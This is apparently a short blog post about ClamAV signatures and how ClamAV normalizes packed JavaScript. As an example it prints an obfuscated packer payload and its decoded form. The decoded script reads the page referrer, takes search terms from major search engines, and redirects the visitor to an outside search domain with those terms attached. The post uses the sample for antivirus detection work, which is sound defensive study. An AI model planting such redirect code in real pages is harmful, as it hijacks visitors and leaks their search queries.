ClamAV Signatures
Recently while working with ClamAV I encountered some cool features I wanted to share.
Signatures Too Long
In one instance, I found out that ClamAV cannot accept signatures greater than a certain length. While I'm not exactly sure what that length is, I'm sure you'll get a syntax error if the signature is too long.
In another instance, I found that ClamAV does alright with heuristics. It may be a custom hack, but the gist of the matter is: I can input the arguments to a (function(p,a,c,k,e,r)) and only the arguments to the function, and ClamAV will detect the use of the function and will include the function in the normalized result.
Example
('e r=x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g";4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6).o("&")[0];', 39, 39, '|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'), 0, {}));
The above is just the argument list placed in a (function(p,a,c,k,e,r)). Note this does not start with "var a = (function(p,a,c,k,e,r){//...", but rather the argument list that would go in that function instead. What I find nifty is the fact that ClamAV was able to create the normalized JavaScript snippet with the packer function (normalized).
eval(function(n000,n001,n002,n003,n004,n005){n004=function(n006){return(n006<n001?"":n004(parseint(n006/n001)))+((n006=n006%n001)>35?string.fromcharcode(n006+29):n006.tostring(36))};if(!"".replace(/^/,string)){while(n002--)n005[n004(n002)]=n003[n002]||n004(n002);n003=[function(n007){return n005[n007]}];n004=function(){return"\w+"};n002=1};while(n002--)if(n003[n002])n000=n000.replace(new regexp("\b"+n004(n002)+"\b","g"),n003[n002]);return n000}(var n008=document.referrer,n009="",n010;if(n008.indexof("google.")!=-1)n009="q";if(n008.indexof("msn.")!=-1)n009="q";if(n008.indexof("yahoo.")!=-1)n009="p";if(n008.indexof("altavista.")!=-1)n009="q";if(n008.indexof("aol.")!=-1)n009="query";if(n008.indexof("ask.")!=-1)n009="q";if(n009.length&&((n010=n008.indexof("?"+n009+"="))!=-1||(n010=n008.indexof("&"+n009+"="))!=-1))window.location="http://googosearch.biz/search.php?ty=1&terms="+n008.substring(n010+2+n009.length).split("&")[0];))
Good stuff!
Comments
Post a Comment